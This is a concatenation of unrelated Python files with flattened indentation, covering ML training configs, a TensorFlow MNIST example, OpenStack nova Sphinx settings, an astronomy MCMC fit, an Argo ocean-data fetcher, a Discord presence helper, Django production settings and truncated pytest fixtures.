checkpoint_callback = CustomModelCheckpoint(checkpoint_dir, checkpoint_filename)
trainer_config = {
'max_epochs': args.epochs,
'gpus': 4 if not args.tiny else 1,
'accelerator': 'ddp',
'precision': 16,
'accumulate_grad_batches': 8,
'profiler': None,
# for debugging: runs 1 train, val, test batch and program ends
'fast_dev_run': False,
'log_every_n_steps': 100,
'deterministic': True,
'default_root_dir': checkpoint_dir,
'logger': logger,
# turn off the warning
'plugins': [pl.plugins.DDPPlugin(find_unused_parameters=False)],
'callbacks': [checkpoint_callback],
'resume_from_checkpoint': args.load
}
if args.tiny:
trainer_config['limit_train_batches'] = 10
trainer_config['limit_val_batches'] = 10
trainer_config['limit_test_batches'] = 10
_info = {
**_info,
'output_checkpoint_filename': checkpoint_filename,
'model_config': model_config,
'trainer_config': trainer_config
}
print(f"Info: {json.dumps(_info, indent=4, default=str)}")
sweep_config = {
'method': 'random', # grid, random, bayesian
'metric': {
'name': 'val_object_f1',
'goal': 'maximize'
},
'parameters': {
'random_seed': {
'values': [model_config['random_seed']]
},
'learning_rate': {
'values': [model_config['learning_rate']]
},
'batch_size': {
'values': [model_config['batch_size']]
},
'epochs': {'value': model_config['epochs']},
'dropout': {
'values': [model_config['dropout']]
},
'max_seq_length': {'value': model_config['max_seq_length']},
}
}
model_config['random_seed'] = int(SEEDS[0])
pl.seed_everything(model_config['random_seed'], workers=True)
if args.mode == 'train':
main_train()
else:
if args.load is None:
print(f"WARNING! No model loaded, so testing with untrained model")
elif feature_str.replace('-tiny', '') not in args.load:
raise ValueError(
f"Input features do not match with loaded model: \n"
f"\t'{feature_str.replace('-tiny', '').replace('-object_counts=True', '')}' vs \n"
f"\t'{args.load}'")
if args.mode == 'test':
main_test(args.wandb_id)
elif args.mode == 'predict':
main_predict()
else:
print(f"mode not recognised: {args.mode}")
|
import tensorflow as tf
import matplotlib.pyplot as plt
from tensorflow.examples.tutorials.mnist import input_data
mnist = input_data.read_data_sets("MNIST_data/",one_hot=True)
type(mnist)
image_shape = mnist.train.images[1].shape
# plt.imshow(mnist.train.images[1].reshape(28,28))
# plt.imshow(mnist.train.images[1].reshape(28,28),cmap='gist_gray')
# mnist.train.images[1].max()
# plt.imshow(mnist.train.images[1].reshape(784,1))
# plt.imshow(mnist.train.images[1].reshape(784,1),cmap='gist_gray',aspect=0.02)
x = tf.placeholder("float",shape=[None,784])
W = tf.Variable(tf.zeros([784,10]))
b = tf.Variable(tf.zeros([10]))
y = tf.matmul(x,W) + b
y_true = tf.placeholder("float",[None,10])
cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y_true, logits=y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.3)
train = optimizer.minimize(cross_entropy)
init = tf.global_variables_initializer()
with tf.Session() as sess:
sess.run(init)
for step in range(2000):
## Provide training batches via TensorFlow's built-in next_batch helper
batch_x , batch_y = mnist.train.next_batch(150)
sess.run(train,feed_dict={
x:batch_x,
y_true:batch_y
})
## TESTING THE MODEL
matches = tf.equal(tf.argmax(y,1),tf.argmax(y_true,1))
accuracy = tf.reduce_mean(tf.cast(matches,"float"))
print(sess.run(accuracy, feed_dict={
x:mnist.test.images,
y_true:mnist.test.labels
}))
|
"""
This package/directory contains the
tcheasy & sorpa examples.
Feel free to take them as a blueprint.
"""
|
_base_ = [
'../_base_/models/sagan_128x128.py', '../_base_/datasets/imagenet_128.py',
'../_base_/default_runtime.py'
]
init_cfg = dict(type='studio')
model = dict(
generator=dict(num_classes=1000, init_cfg=init_cfg),
discriminator=dict(num_classes=1000, init_cfg=init_cfg),
)
lr_config = None
checkpoint_config = dict(interval=10000, by_epoch=False, max_keep_ckpts=20)
custom_hooks = [
dict(
type='VisualizeUnconditionalSamples',
output_dir='training_samples',
interval=1000)
]
inception_pkl = './work_dirs/inception_pkl/imagenet.pkl'
evaluation = dict(
type='GenerativeEvalHook',
interval=10000,
metrics=[
dict(
type='FID',
num_images=50000,
inception_pkl=inception_pkl,
bgr2rgb=True,
inception_args=dict(type='StyleGAN')),
dict(type='IS', num_images=50000)
],
best_metric=['fid', 'is'],
sample_kwargs=dict(sample_model='orig'))
n_disc = 1
total_iters = 1000000 * n_disc
# use ddp wrapper for faster training
use_ddp_wrapper = True
find_unused_parameters = False
runner = dict(
type='DynamicIterBasedRunner',
is_dynamic_ddp=False, # Note that this flag should be False.
pass_training_status=True)
metrics = dict(
fid50k=dict(
type='FID',
num_images=50000,
inception_pkl=inception_pkl,
inception_args=dict(type='StyleGAN')),
IS50k=dict(type='IS', num_images=50000))
optimizer = dict(
generator=dict(type='Adam', lr=0.0001, betas=(0.0, 0.999)),
discriminator=dict(type='Adam', lr=0.0004, betas=(0.0, 0.999)))
# train on 4 gpus
data = dict(samples_per_gpu=64)
|
'''
Swap the min and max elements of a list in place
'''
def exchangeMinMax(a):
minEl = float('inf')
minId = -1
maxEl = float('-inf')
maxId = -1
for i in range(len(a)):
if (a[i] > maxEl):
maxEl = a[i]
maxId = i
if (a[i] < minEl):
minEl = a[i]
minId = i
(a[minId], a[maxId]) = (a[maxId], a[minId])
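# Illustrative example (assumed input): for "3 1 4 1 5" the minimum (1 at index 1)
# and the maximum (5 at index 4) are swapped in place, so the program prints "3 5 4 1 1".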
a = list(map(int, input().split()))
exchangeMinMax(a)
print(*a)
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# nova documentation build configuration file
#
# Refer to the Sphinx documentation for advice on configuring this file:
#
# http://www.sphinx-doc.org/en/stable/config.html
import os
import sys
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('../'))
# -- General configuration ----------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.graphviz',
'openstackdocstheme',
'sphinx_feature_classification.support_matrix',
'oslo_config.sphinxconfiggen',
'oslo_config.sphinxext',
'oslo_policy.sphinxpolicygen',
'oslo_policy.sphinxext',
'ext.versioned_notifications',
'ext.feature_matrix',
'sphinxcontrib.actdiag',
'sphinxcontrib.seqdiag',
'sphinxcontrib.rsvgconverter',
]
# openstackdocstheme options
repository_name = 'openstack/nova'
bug_project = 'nova'
bug_tag = 'doc'
config_generator_config_file = '../../etc/nova/nova-config-generator.conf'
sample_config_basename = '_static/nova'
policy_generator_config_file = [
('../../etc/nova/nova-policy-generator.conf', '_static/nova'),
]
actdiag_html_image_format = 'SVG'
actdiag_antialias = True
seqdiag_html_image_format = 'SVG'
seqdiag_antialias = True
todo_include_todos = True
# The master toctree document.
master_doc = 'index'
# General information about the project.
copyright = u'2010-present, OpenStack Foundation'
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# -- Options for man page output ----------------------------------------------
# Grouping the document tree for man pages.
# List of tuples 'sourcefile', 'target', u'title', u'Authors name', 'manual'
_man_pages = [
('nova-api', u'Cloud controller fabric'),
('nova-api-metadata', u'Cloud controller fabric'),
('nova-api-os-compute', u'Cloud controller fabric'),
('nova-compute', u'Cloud controller fabric'),
('nova-conductor', u'Cloud controller fabric'),
('nova-manage', u'Cloud controller fabric'),
('nova-novncproxy', u'Cloud controller fabric'),
('nova-rootwrap', u'Cloud controller fabric'),
('nova-scheduler', u'Cloud controller fabric'),
('nova-serialproxy', u'Cloud controller fabric'),
('nova-spicehtml5proxy', u'Cloud controller fabric'),
('nova-status', u'Cloud controller fabric'),
('nova-xvpvncproxy', u'Cloud controller fabric'),
]
man_pages = [
('cli/%s' % name, name, description, [u'OpenStack'], 1)
for name, description in _man_pages]
# -- Options for HTML output --------------------------------------------------
# The theme to use for HTML and HTML Help pages. Major themes that come with
# Sphinx are currently 'default' and 'sphinxdoc'.
html_theme = 'openstackdocs'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any paths that contain "extra" files, such as .htaccess or
# robots.txt.
html_extra_path = ['_extra']
# -- Options for LaTeX output -------------------------------------------------
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass
# [howto/manual]).
latex_documents = [
('index', 'doc-nova.tex', u'Nova Documentation',
u'OpenStack Foundation', 'manual'),
]
# Allow deeper levels of nesting for \begin...\end stanzas
latex_elements = {
'maxlistdepth': 10,
'extraclassoptions': 'openany,oneside',
'preamble': r'''
\setcounter{tocdepth}{3}
\setcounter{secnumdepth}{3}
''',
}
# Disable use of xindy since that's another binary dependency that's not
# available on all platforms
latex_use_xindy = False
# -- Options for openstackdocstheme -------------------------------------------
# keep this ordered to keep mriedem happy
#
# NOTE(stephenfin): Projects that don't have a release branch, like TripleO and
# reno, should not be included here
openstack_projects = [
'ceilometer',
'cinder',
'glance',
'horizon',
'ironic',
'keystone',
'neutron',
'nova',
'oslo.log',
'oslo.messaging',
'oslo.i18n',
'oslo.versionedobjects',
'placement',
'python-novaclient',
'python-openstackclient',
'watcher',
]
# -- Custom extensions --------------------------------------------------------
# NOTE(mdbooth): (2019-03-20) Sphinx loads policies defined in setup.cfg, which
# includes the placement policy at nova/api/openstack/placement/policies.py.
# Loading this imports nova/api/openstack/__init__.py, which imports
# nova.monkey_patch, which will do eventlet monkey patching to the sphinx
# process. As well as being unnecessary and a bad idea, this breaks on
# python3.6 (but not python3.7), so don't do that.
os.environ['OS_NOVA_DISABLE_EVENTLET_PATCHING'] = '1'
def monkey_patch_blockdiag():
"""Monkey patch the blockdiag library.
The default word wrapping in blockdiag is poor, and breaks on a fixed
text width rather than on word boundaries. There's a patch submitted to
resolve this [1]_ but it's unlikely to merge anytime soon.
In addition, blockdiag monkey patches a core library function,
``codecs.getreader`` [2]_, to work around some Python 3 issues. Because
this operates in the same environment as other code that uses this library,
it ends up causing issues elsewhere. We undo these destructive changes
pending a fix.
TODO: Remove this once blockdiag is bumped to 1.6, which will hopefully
include the fix.
.. [1] https://bitbucket.org/blockdiag/blockdiag/pull-requests/16/
.. [2] https://bitbucket.org/blockdiag/blockdiag/src/1.5.3/src/blockdiag/utils/compat.py # noqa
"""
import codecs
from codecs import getreader
from blockdiag.imagedraw import textfolder
# oh, blockdiag. Let's undo the mess you made.
codecs.getreader = getreader
def splitlabel(text):
"""Split text to lines as generator.
Every line will be stripped. If text includes characters "\n\n", treat
as line separator. Ignore '\n' to allow line wrapping.
"""
lines = [x.strip() for x in text.splitlines()]
out = []
for line in lines:
if line:
out.append(line)
else:
yield ' '.join(out)
out = []
yield ' '.join(out)
def splittext(metrics, text, bound, measure='width'):
folded = [' ']
for word in text.split():
# Try appending the word to the last line
tryline = ' '.join([folded[-1], word]).strip()
textsize = metrics.textsize(tryline)
if getattr(textsize, measure) > bound:
# Start a new line. Appends `word` even if > bound.
folded.append(word)
else:
folded[-1] = tryline
return folded
# monkey patch those babies
textfolder.splitlabel = splitlabel
textfolder.splittext = splittext
monkey_patch_blockdiag()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import inspect
import numpy as np
import emcee
import george
from george import kernels
import os
import sys
currentframe = inspect.currentframe()
currentdir = os.path.dirname(os.path.abspath(inspect.getfile(currentframe)))
parentdir = os.path.dirname(currentdir)
sys.path.insert(0, parentdir)
import profiles
import gpew
import matplotlib.pyplot as pl
def single_kernel_noisemodel(p):
"""
Simple one squared-exponential kernel noise model.
"""
return george.GP(p[0] * kernels.ExpSquaredKernel(p[1]))
def single_kernel_lnprior(p):
amp, xcen, sigma, lna, lnalpha = p
if (-50. < lna < 0. and amp > 0. and sigma > 0. and xcen > 8685 and
xcen < 8690):
return 0.0
return -np.inf
def chi2_lnprior(p):
amp, xcen, sigma = p
if (amp > 0. and sigma > 0. and xcen > 8685 and xcen < 8690):
return 0.0
return -np.inf
d = np.loadtxt('spec.txt').T
sel = (d[0] > 8680) & (d[0] < 8696)
yerr = np.ones_like(d[0][sel]) * 0.01
lines = [(d[0][sel], d[1][sel], yerr)]
pfiles = [profiles.gaussian]
pparn = np.cumsum([0] +\
[len(inspect.getargspec(i)[0]) - 1 for i in pfiles])
###############################################################################
# GP modelled line
initial = [0.28, 8687.82, 1.53, -6.1, 0.3]
nwalkers = 128
ndim = len(initial)
niter = 100
noisemodel = single_kernel_noisemodel
data = [lines, pfiles, pparn, noisemodel, single_kernel_lnprior]
p0 = np.array([np.array(initial) + 1e-2 * np.random.randn(ndim)
for i in range(nwalkers)])
sampler = emcee.EnsembleSampler(nwalkers, ndim, gpew.lnprob, args=data)
p0, lnp, _ = sampler.run_mcmc(p0, niter)
sampler.reset()
p = p0[np.argmax(lnp)]
p0 = [p + 1e-2 * np.random.randn(ndim) for i in range(nwalkers)]
p0, _, _ = sampler.run_mcmc(p0, niter)
samples = sampler.flatchain
xcen = samples[:, 1]
mxcen = np.mean(xcen)
xs = np.linspace(-8.1, 8.1, 100)
models = []
clean_models = []
ew = []
for s in samples[np.random.randint(len(samples), size=100)]:
pars = s[pparn[0]:pparn[1]]
profile = 1 - pfiles[0](lines[0][0], *pars)
profilexs = 1 - pfiles[0](xs + mxcen, *pars)
clean_models.append(profilexs)
ew.append(np.sum((1 - profilexs[1:]) * (xs[1:] - xs[:-1])))
if noisemodel is not None:
nmp = np.exp(s[pparn[-1]:])
nm = noisemodel(nmp)
nm.compute(lines[0][0], lines[0][2])
m = nm.sample_conditional(lines[0][1] - profile,
xs + mxcen) + profilexs
models.append(m)
offset = 0.0
pl.errorbar(lines[0][0] - mxcen, lines[0][1] + offset, yerr=lines[0][2],
fmt=".k", capsize=0)
pl.text(xs[0], offset + 1.02, '%.2f +- %.2f' % (np.mean(ew),
np.std(ew)))
la = np.array(clean_models).T
lstd = np.std(la, axis=1)
lavg = np.average(la, axis=1)
y1, y2 = lavg + lstd + offset, lavg - lstd + offset
pl.fill_between(xs, y1, y2, alpha=0.3)
gpa = np.array(models).T
gpstd = np.std(gpa, axis=1)
gpavg = np.average(gpa, axis=1)
y1, y2 = gpavg + gpstd + offset, gpavg - gpstd + offset
pl.fill_between(xs, y1, y2, color='r', alpha=0.3)
###############################################################################
# Chi2 modelled line
initial = [0.28, 8687.82, 1.53]
ndim = len(initial)
noisemodel = None
data = [lines, pfiles, pparn, noisemodel, chi2_lnprior]
p0 = np.array([np.array(initial) + 1e-2 * np.random.randn(ndim)
for i in range(nwalkers)])
sampler = emcee.EnsembleSampler(nwalkers, ndim, gpew.lnprob, args=data)
p0, lnp, _ = sampler.run_mcmc(p0, niter)
sampler.reset()
p = p0[np.argmax(lnp)]
p0 = [p + 1e-2 * np.random.randn(ndim) for i in range(nwalkers)]
p0, _, _ = sampler.run_mcmc(p0, niter)
samples = sampler.flatchain
xcen = samples[:, 1]
mxcen = np.mean(xcen)
clean_models = []
ew = []
for s in samples[np.random.randint(len(samples), size=100)]:
pars = s[pparn[0]:pparn[1]]
profilexs = 1 - pfiles[0](xs + mxcen, *pars)
clean_models.append(profilexs)
ew.append(np.sum((1 - profilexs[1:]) * (xs[1:] - xs[:-1])))
offset = 0.3
pl.errorbar(lines[0][0] - mxcen, lines[0][1] + offset, yerr=lines[0][2],
fmt=".k", capsize=0)
pl.text(xs[0], offset + 1.02, '%.2f +- %.2f' % (np.mean(ew),
np.std(ew)))
la = np.array(clean_models).T
lstd = np.std(la, axis=1)
lavg = np.average(la, axis=1)
y1, y2 = lavg + lstd + offset, lavg - lstd + offset
pl.fill_between(xs, y1, y2, alpha=0.3)
pl.show()
|
#!/bin/env python
# -*- coding: utf-8 -*-
#
# Argo data fetcher for Argovis.
# Code borrows heavily from API gathered at:
# https://github.com/earthcube2020/ec20_tucker_etal/blob/master/EC2020_argovis_python_api.ipynb
#
# This is comprised of functions used to query Argovis api
# query functions either return dictionary objects or error messages.
#
import numpy as np
import pandas as pd
import xarray as xr
import json
import getpass
from .proto import ArgoDataFetcherProto
from abc import abstractmethod
import warnings
from argopy.stores import httpstore
from argopy.options import OPTIONS
from argopy.utilities import list_standard_variables
from argopy.errors import DataNotFound
from argopy.plotters import open_dashboard
access_points = ['wmo', 'box']
exit_formats = ['xarray']
dataset_ids = ['phy'] # First is default
api_server = 'https://argovis.colorado.edu' # API root url
api_server_check = api_server + '/catalog' # URL to check if the API is alive
class ArgovisDataFetcher(ArgoDataFetcherProto):
###
# Methods to be customised for a specific Argovis request
###
@abstractmethod
def init(self):
""" Initialisation for a specific fetcher """
pass
@abstractmethod
def cname(self):
""" Return a unique string defining the request
Provide this string to populate meta data and titles
"""
pass
@property
def url(self):
""" Return the URL used to download data """
pass
###
# Methods that must not change
###
def __init__(self,
ds: str = "",
cache: bool = False,
cachedir: str = "",
**kwargs):
""" Instantiate an Argovis Argo data loader
Parameters
----------
ds: 'phy'
cache : False
cachedir : None
"""
self.fs = httpstore(cache=cache, cachedir=cachedir, timeout=120)
self.definition = 'Argovis Argo data fetcher'
self.dataset_id = OPTIONS['dataset'] if ds == '' else ds
self.server = api_server
self.init(**kwargs)
self.key_map = {
'date': 'TIME',
'date_qc': 'TIME_QC',
'lat': 'LATITUDE',
'lon': 'LONGITUDE',
'cycle_number': 'CYCLE_NUMBER',
'DATA_MODE': 'DATA_MODE',
'DIRECTION': 'DIRECTION',
'platform_number': 'PLATFORM_NUMBER',
'position_qc': 'POSITION_QC',
'pres': 'PRES',
'temp': 'TEMP',
'psal': 'PSAL',
'index': 'N_POINTS'
}
def __repr__(self):
summary = ["<datafetcher '%s'>" % self.definition]
summary.append("Domain: %s" % self.cname())
return '\n'.join(summary)
def _add_history(self, this, txt):
if 'history' in this.attrs:
this.attrs['history'] += "; %s" % txt
else:
this.attrs['history'] = txt
return this
def json2dataframe(self, profiles):
""" convert json data to Pandas DataFrame """
# Make sure we deal with a list
if isinstance(profiles, list):
data = profiles
else:
data = [profiles]
# Transform
rows = []
for profile in data:
keys = [x for x in profile.keys() if x not in ['measurements', 'bgcMeas']]
meta_row = dict((key, profile[key]) for key in keys)
for row in profile['measurements']:
row.update(meta_row)
rows.append(row)
df = pd.DataFrame(rows)
return df
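# Rough sketch of the input json2dataframe expects (field names match key_map above,
# but the example values are assumptions, not real Argovis output):
#     {'platform_number': 6902746, 'date': '2020-01-01T00:00:00Z', 'cycle_number': 1,
#      'measurements': [{'pres': 5.0, 'temp': 12.3, 'psal': 35.1}, ...]}
# Each entry of 'measurements' becomes one DataFrame row with the profile-level
# metadata repeated on it.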
def to_dataframe(self):
""" """
results = []
urls = self.url
if isinstance(urls, str):
urls = [urls] # Make sure we deal with a list
for url in urls:
js = self.fs.open_json(url)
if isinstance(js, str):
continue
df = self.json2dataframe(js)
df = df.reset_index()
df = df.rename(columns=self.key_map)
df = df[[value for value in self.key_map.values() if value in df.columns]]
results.append(df)
results = [r for r in results if r is not None] # Only keep non-empty results
if len(results) > 0:
df = pd.concat(results, ignore_index=True)
df.sort_values(by=['TIME', 'PRES'], inplace=True)
df = df.set_index(['N_POINTS'])
# df['N_POINTS'] = np.arange(0, len(df['N_POINTS'])) # Re-index to avoid duplicate values
return df
else:
raise DataNotFound("CAN'T FETCH ANY DATA !")
def to_xarray(self):
""" Download and return data as xarray Datasets """
ds = self.to_dataframe().to_xarray()
ds = ds.sortby(['TIME', 'PRES']) # should already be sorted by date in descending order
ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS'])) # Re-index to avoid duplicate values
# Set coordinates:
# ds = ds.set_coords('N_POINTS')
coords = ('LATITUDE', 'LONGITUDE', 'TIME', 'N_POINTS')
ds = ds.reset_coords()
ds['N_POINTS'] = ds['N_POINTS']
# Convert all coordinate variable names to upper case
for v in ds.data_vars:
ds = ds.rename({v: v.upper()})
ds = ds.set_coords(coords)
# Cast data types and add variable attributes (not available in the csv download):
ds = ds.argo.cast_types()
# Remove argovis file attributes and replace them with argopy ones:
ds.attrs = {}
if self.dataset_id == 'phy':
ds.attrs['DATA_ID'] = 'ARGO'
elif self.dataset_id == 'ref':
ds.attrs['DATA_ID'] = 'ARGO_Reference'
elif self.dataset_id == 'bgc':
ds.attrs['DATA_ID'] = 'ARGO-BGC'
ds.attrs['DOI'] = 'http://doi.org/10.17882/42182'
ds.attrs['Fetched_from'] = self.server
ds.attrs['Fetched_by'] = getpass.getuser()
ds.attrs['Fetched_date'] = pd.to_datetime('now').strftime('%Y/%m/%d')
ds.attrs['Fetched_constraints'] = self.cname()
ds.attrs['Fetched_uri'] = self.url
ds = ds[np.sort(ds.data_vars)]
return ds
def filter_data_mode(self, ds, **kwargs):
# Argovis data already curated !
# ds = ds.argo.filter_data_mode(errors='ignore', **kwargs)
if ds.argo._type == 'point':
ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))
return ds
def filter_qc(self, ds, **kwargs):
# Argovis data already curated !
# ds = ds.argo.filter_qc(**kwargs)
if ds.argo._type == 'point':
ds['N_POINTS'] = np.arange(0, len(ds['N_POINTS']))
return ds
def filter_variables(self, ds, mode='standard'):
if mode == 'standard':
to_remove = sorted(list(set(list(ds.data_vars)) - set(list_standard_variables())))
return ds.drop_vars(to_remove)
else:
return ds
class Fetch_wmo(ArgovisDataFetcher):
def init(self, WMO=[], CYC=None):
""" Create Argo data loader for WMOs and CYCs
Parameters
----------
WMO : list(int)
The list of WMOs to load all Argo data for.
CYC : int, np.array(int), list(int)
The cycle numbers to load.
"""
if isinstance(WMO, int):
WMO = [WMO] # Make sure we deal with a list
if isinstance(CYC, int):
CYC = np.array((CYC,), dtype='int') # Make sure we deal with an array of integers
if isinstance(CYC, list):
CYC = np.array(CYC, dtype='int') # Make sure we deal with an array of integers
self.WMO = WMO
self.CYC = CYC
self.definition = "?"
if self.dataset_id == 'phy':
self.definition = 'Argovis Argo data fetcher for floats'
return self
def cname(self):
""" Return a unique string defining the constraints """
if len(self.WMO) > 1:
listname = ["WMO%i" % i for i in self.WMO]
if isinstance(self.CYC, (np.ndarray)):
[listname.append("CYC%0.4d" % i) for i in self.CYC]
listname = ";".join(listname)
else:
listname = "WMO%i" % self.WMO[0]
if isinstance(self.CYC, (np.ndarray)):
listname = [listname]
[listname.append("CYC%0.4d" % i) for i in self.CYC]
listname = "_".join(listname)
listname = self.dataset_id + "_" + listname
return listname
@property
def url(self):
""" Return the URL used to download data """
urls = []
if isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:
profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]
urls.append((self.server + '/catalog/mprofiles/?ids={}').format(profIds).replace(' ', ''))
# elif self.dataset_id == 'bgc' and isinstance(self.CYC, (np.ndarray)) and self.CYC.nbytes > 0:
# profIds = [str(wmo) + '_' + str(cyc) for wmo in self.WMO for cyc in self.CYC.tolist()]
# urls.append((self.server + '/catalog/profiles/{}').format(self.CYC))
else:
for wmo in self.WMO:
urls.append((self.server + '/catalog/platforms/{}').format(str(wmo)))
if len(urls) == 1:
return urls[0]
else:
return urls
def dashboard(self, **kw):
if len(self.WMO) == 1:
return open_dashboard(wmo=self.WMO[0], **kw)
else:
warnings.warn("Plot dashboard only available for one float frequest")
class Fetch_box(ArgovisDataFetcher):
def init(self, box: list):
""" Create Argo data loader
Parameters
----------
box : list(float, float, float, float, float, float, str, str)
The box domain to load all Argo data for:
box = [lon_min, lon_max, lat_min, lat_max, pres_min, pres_max, datim_min, datim_max]
"""
if len(box) == 6:
            # Select the last month of data:
end = pd.to_datetime('now')
start = end - pd.DateOffset(months=1)
box.append(start.strftime('%Y-%m-%d'))
box.append(end.strftime('%Y-%m-%d'))
elif len(box) != 8:
            raise ValueError('Box must be a list with 6 or 8 elements')
self.BOX = box
self.definition = '?'
if self.dataset_id == 'phy':
self.definition = 'Argovis Argo data fetcher for a space/time region'
return self
def cname(self):
""" Return a unique string defining the constraints """
BOX = self.BOX
boxname = ("[x=%0.2f/%0.2f; y=%0.2f/%0.2f; z=%0.1f/%0.1f; t=%s/%s]") % \
(BOX[0], BOX[1], BOX[2], BOX[3], BOX[4], BOX[5],
self._format(BOX[6], 'tim'), self._format(BOX[7], 'tim'))
boxname = self.dataset_id + "_" + boxname
return boxname
@property
def url(self):
""" Return the URL used to download data """
shape = [[[self.BOX[0], self.BOX[2]], [self.BOX[0], self.BOX[3]], [self.BOX[1], self.BOX[3]],
[self.BOX[1], self.BOX[2]], [self.BOX[0], self.BOX[2]]]]
strShape = str(shape).replace(' ', '')
url = self.server + '/selection/profiles'
url += '?startDate={}'.format(self.BOX[6])
url += '&endDate={}'.format(self.BOX[7])
url += '&shape={}'.format(strShape)
url += '&presRange=[{},{}]'.format(self.BOX[4], self.BOX[5])
return url
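# --- Hedged illustration (not part of the original module) ----------------------------
# Tracing Fetch_box.url above with a hypothetical box
#   box = [-75, -70, 30, 35, 0, 100, '2020-01-01', '2020-01-31']
# the shape polygon is the four box corners closed back on the start point:
#   [[[-75,30],[-75,35],[-70,35],[-70,30],[-75,30]]]
# and the resulting request looks like:
#   <server>/selection/profiles?startDate=2020-01-01&endDate=2020-01-31
#       &shape=[[[-75,30],[-75,35],[-70,35],[-70,30],[-75,30]]]&presRange=[0,100]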
|
from .awslambdaevent import *
from .awslambda import *
|
import sys
import logging
def get_rpc_update():
# Grabs data from applications
logging.debug("Checking OS...")
if sys.platform in ['Windows', 'win32', 'cygwin']:
# Windows data retrieval
try:
logging.debug("Importing Windows specific modules...")
from api.windows import get_title, get_process_info, get_status
app_info = get_process_info()
            if app_info is not None:
                # Information to publicly show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
            # If 'get_process_info()' doesn't find a matching 'processName' element, log an error
            else:
                logging.error("Unable to find process")
        except ImportError:
            logging.error(
                "Required dependency not found! Did you install all dependencies? Check the README")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
elif sys.platform in ['Mac', 'darwin', 'os2', 'os2emx']:
# macOS data retrieval
try:
logging.debug("Importing macOS specific modules...")
from api.macos import get_title, get_process_info, get_status
app_info = get_process_info()
            if app_info is not None:
                # Information to publicly show to Discord
app_title = get_title(app_info['pid'])
app_state = get_status(app_info, app_title)
# Dictionary setup to return application info
rpc_update = {'state': app_state,
'small_image': app_info['smallImageKey'],
'large_image': app_info['largeImageKey'],
'large_text': app_info['largeText'],
'small_text': app_info['smallText'],
'details': app_info['largeText']}
# Returns data from processing the application data
return rpc_update
            # If 'get_process_info()' doesn't find a matching 'processName' element, log an error
            else:
                logging.error("Unable to find process")
        except ImportError:
            logging.error(
                "Required dependency not found! Did you install all dependencies? Check the README")
raise SystemExit(1)
except TypeError:
logging.error("No Adobe Applications running!")
else:
logging.error("Unknown operating system! Exiting...")
logging.error("If you believe this is an error. Submit a bug report.")
raise SystemExit(0)
def exception_handler(exception, future):
logging.exception("Something bad happened. Printing stacktrace...")
|
from .base import *
DEBUG = False
ALLOWED_HOSTS = [
get_secret('ALLOWED_HOSTS'),
'www.' + get_secret('ALLOWED_HOSTS'),
]
WSGI_APPLICATION = 'project.wsgi_prod.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
        'ENGINE': 'django.db.backends.postgresql',  # this is different!
'NAME': get_secret('NAME'),
'USER': get_secret('USER'),
'PASSWORD': get_secret('PASSWORD'),
'HOST': get_secret('HOST'),
'PORT': get_secret('PORT'),
},
}
RECAPTCHA_PUBLIC_KEY = get_secret('RECAPTCHA_PUBLIC_KEY')
RECAPTCHA_PRIVATE_KEY = get_secret('RECAPTCHA_PRIVATE_KEY')
# Mail configuration
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'
EMAIL_HOST = get_secret('EMAIL_HOST')
EMAIL_PORT = get_secret('EMAIL_PORT')
EMAIL_HOST_USER = get_secret('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = get_secret('EMAIL_HOST_PASSWORD')
EMAIL_USE_SSL = True
SERVER_EMAIL = get_secret('SERVER_EMAIL')
DEFAULT_FROM_EMAIL = get_secret('DEFAULT_FROM_EMAIL')
DEFAULT_RECIPIENT = get_secret('DEFAULT_RECIPIENT')
STATIC_ROOT = get_secret('STATIC_ROOT')  # no trailing slash
STATIC_URL = get_secret('BASE_URL') + '/static/'
MEDIA_ROOT = get_secret('MEDIA_ROOT')  # no trailing slash
MEDIA_URL = get_secret('BASE_URL') + '/media/'
PRIVATE_STORAGE_ROOT = get_secret('PRIVATE_STORAGE_ROOT')
PRIVATE_STORAGE_AUTH_FUNCTION = get_secret('PRIVATE_STORAGE_AUTH_FUNCTION')
SECRET_KEY = get_secret('SECRET_KEY')
REST_API_TARGET = get_secret('REST_API_TARGET') + '/wp-json/wp/v2/'
# Base URL to use when referring to full URLs within the Wagtail admin backend -
# e.g. in notification emails. Don't include '/admin' or a trailing slash
BASE_URL = get_secret('BASE_URL')
try:
from .local import *
except ImportError:
pass
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division
import pytest
from ndeftool.cli import main
@pytest.fixture
def runner():
import click.testing
return click.testing.CliRunner()
@pytest.fixture
def isolated_runner(runner):
with runner.isolated_filesystem():
yield runner
def test_help_option_prints_usage(runner):
